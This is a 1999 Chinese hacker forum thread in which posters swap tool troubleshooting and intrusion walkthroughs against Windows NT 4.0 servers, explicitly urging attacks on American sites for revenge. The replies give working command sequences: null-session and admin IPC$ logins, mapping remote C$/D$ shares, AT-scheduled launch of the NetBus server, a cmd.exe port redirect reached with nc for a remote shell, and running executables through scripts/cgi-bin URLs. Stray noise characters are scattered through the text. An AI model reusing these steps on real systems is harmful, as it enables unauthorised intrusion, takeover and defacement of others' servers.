《版主页黑客工具和文章的几个问题》中提到:
5 B" J$ K% ^' @, ~4 E2 O( U! a请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。 C: b; g O: q
> 我的机子MMX166,WIN98,2。5G,32M内存。5 o0 N& Y" g0 N- V" Q- J
7 M3 _# x7 d1 v: ~2 b) o黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
! |" v2 S4 K2 q2 e O4 e# M你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。$ g* }/ {7 @" y
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:& N, d0 g5 |9 q
net use \\111.111.111.111\ipc$ "" /user:""$ G$ h4 U( a: z5 x* r* n& Y3 d5 ]
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:: A4 J( V9 t5 J% D! j
net view \\111.111.111.111
& @- V1 Y6 ^2 j8 c# T$ _当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:$ j# X @* ~. M9 r5 R+ x2 N
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
( l7 G$ J1 t: u命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
. }: _4 n1 p( h1 }1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
: O2 r- f* J* ^- W. U- n3 k, A Qnet use x: \\111.111.111.111\c$, g8 u6 C- X" O. o' B
net use y: \\111.111.111.111\d$
' Q. S- V" J. Q/ |) X R% k# C这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
# t: z% h8 x% w* R2、管理目标NT的用户:4 o! H3 I8 d6 q; k/ M- U5 c+ q
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
5 q8 J9 B: z0 _( y8 y7 k3 t3 Q' e键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样% X9 Z+ K. y7 g ]8 U& h
3、管理目标NT的服务
+ p7 _+ h! |4 n! P5 Q8 e; M% w选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
3 n7 b# T' M- C7 P% ]这样你可以管理目标NT上的服务,共享目录 \* I( o. T/ Y# d1 x
4、IIS管理% h& z) L. q5 k. r
选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
: {4 c; z* R7 ~! n, Q目标NT的FTP、WWW服务你就可以重新配置
; A$ ?% a, Z4 i- l0 f5、事件管理
5 `7 X) e9 f& {“事件查看器”->连接到服务器->111.111.111.111
, p8 m$ K* M$ B- I* z
% n5 [* r2 [9 V. ]: x还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
- w% X" ]; e- \6 L! r) e) k3 M3 B5 ^& P6 H! E0 _
当然,98,95也能做一些事情,但很麻烦,比如:
* s9 j7 O. w2 b& a- s! }6 y2 lnet use \\111.111.111.111\ipc$
4 j v7 l' w! D. x3 R3 Nnet use z: \\111.111.111.111\d$
$ G" r" S% H: Z% ~+ c7 M R但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
0 `6 t4 \$ G: W. r
! v1 c; Y" u& K- H/ X' A! g我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!2 M; O/ M# f. t3 N( I
这样,你还可以了解目标机器上能有什么东东供你去用! r S" \$ n; { M! w1 q
! G0 v+ y5 r& R& j9 _
; V; m3 A7 Q; p! y
--------------------------------------------------------------------------------
" j4 i, K! U5 m! ]' B
3 q9 V" s7 S# C( E0 f) L- u>quack于1999-06-12,23:37:44: g9 b' b7 v; U" _
在大作《几个有关黑的问题》中提到:* K% [; N6 K+ D+ w7 @" I
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
) T) ^2 t6 t* s; T
: a: }6 U: a5 Pkillusa于1999-06-13,03:25:15
2 A- I& f5 e! J# P& X |3 T) D1 h在大作《Re: 几个有关黑的问题》中提到:" W8 N4 ?. q& V
: O( j" v, y- R7 {: j( i6 J A4 d
letmein.exe 暂时没有mypwd参数,十分抱歉
, p6 V5 X3 u5 B; C' h3 A3 jpinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。* t7 g/ G; w# s* P" \- Z6 R& z
; ?4 V2 k( Z0 G% }" {8 H% D
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
' e# l% \7 J6 M% m, L- U服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
~/ L4 U8 c% t7 W Y* V% @/ J" A4 C4 B( O5 d# b2 B3 M9 |+ n
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:0 I$ P! \- \5 w
7 T( k: i+ z6 G% R8 t( ]8 D K
C:\>net start schedule! a" z9 ~3 Y0 F- S) K& G
Schedule 正在启动服务.....- e) Y, q4 e9 w0 `' r# H5 ~
Schedulw 服务启动成功。9 `: l8 Z2 r/ U3 q
C:\>at /?+ q+ m* x, ~% Z0 s; _ i
AT 命令排定在特定的日期和时间运行某些命令和程序。" X/ Z3 e2 C! }) ]8 Q& S
运行 AT 命令之前必须先启动 Schedule 服务。
V( y, r9 E5 k( D, p5 r( S: V- o4 a* n$ c8 i
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]/ ^: [4 _& Q( C5 ]
AT [\\computername] time [/INTERACTIVE]
3 A P3 y- Q1 T. U[ /EVERY:date[,...] | /NEXT:date[,...]] "command"3 y" a2 S) [, H5 [9 K& u1 P
! e5 C# o1 y$ o3 y9 g2 |3 R- s
\\computername 指定远程计算机。 如果省略这个参数3 M: {! l% }- ?9 f1 G8 m
命令会被排定在本机上运行。! K; s2 O p. d
id 指定给排定进度命令的识别号。4 }) O, X9 w; G
2 Q4 p* ?4 K0 g: `9 @& g0 X/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。% j+ l6 V/ H" o; c: n! J+ t
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
/ D' p: B9 _% D" u5 i) b2 X- [& utime 指定命令运行的时间。4 W6 U5 _, N; i$ F' `. y; N. y
/interactive 允许作业在运行时,与用户通过桌面交互。: ?$ M: h9 U' ^# z. {1 d
( P( A2 d/ l# a9 }) T/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。6 {; I9 ]4 @: N& l5 U/ G9 Q
如果省略日期,则默认为在每月的本日运行。2 I* T1 O: P( e: ~, s4 d: p5 P
+ H6 v# f4 e4 r1 Z d6 c/ L( R2 t
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。- f( x! l, G& M1 @+ O. \# a
+ e) x4 ?' Q& \/ k# s
"command" 准备运行的 Windows NT 命令或批处理文件。
! d/ D$ A, s# z5 n: P$ F; c2 L' E4 l/ _. l c
C:\>
: L1 ]& T- v2 [7 x: G" G
/ e% `* p+ u# u! @$ m' ~5 q知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
' r' v {( B8 X1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"2 R! ?& s( q6 r* d/ A6 J* A0 D
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
. R7 M! b0 ^6 N8 C3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:& V* m+ [3 M3 h/ b
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
' H6 ?* p7 C. _3 p其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:2 h( |! ^: M: [ A1 E) S
Microsoft(R) Windows NT(TM)1 {6 k! e2 ^- Q$ D7 P/ K% C
(C) Copyright 1985-1996 Microsoft Corp., ^" [) T' g4 B, ?/ v+ [0 g
C:\>9 a& C6 A* J, E. w
6 A6 g3 N* `4 X0 u- J' i& v2、利用web启动ntsrv.exe或其他程序在目的服务器- {8 Y6 k3 w* L! } b- j1 d
; ^. `- H1 U4 O' ]6 W5 N, i将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如: U, s1 N8 G, n! k' M
http://x.x.x.x/scripts/ntsrv.exe /port:643219 R9 D' Q( V3 o3 h, @
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321( e0 ]* `: ?8 n" k; u7 m4 Z4 i: K
该程序就启动了
( G; T6 W/ E: Q$ U1 f, u+ `8 \) N) S5 L ^. R+ G' W
我只提这几中方法! i5 t1 Q1 X. I* J! Y! i" a
要成功,必须打好基础工,对操作系统充分了解!
% V6 C/ g% m) Q+ ?4 K+ y2 e
m7 x( G) ?5 ]5 ] |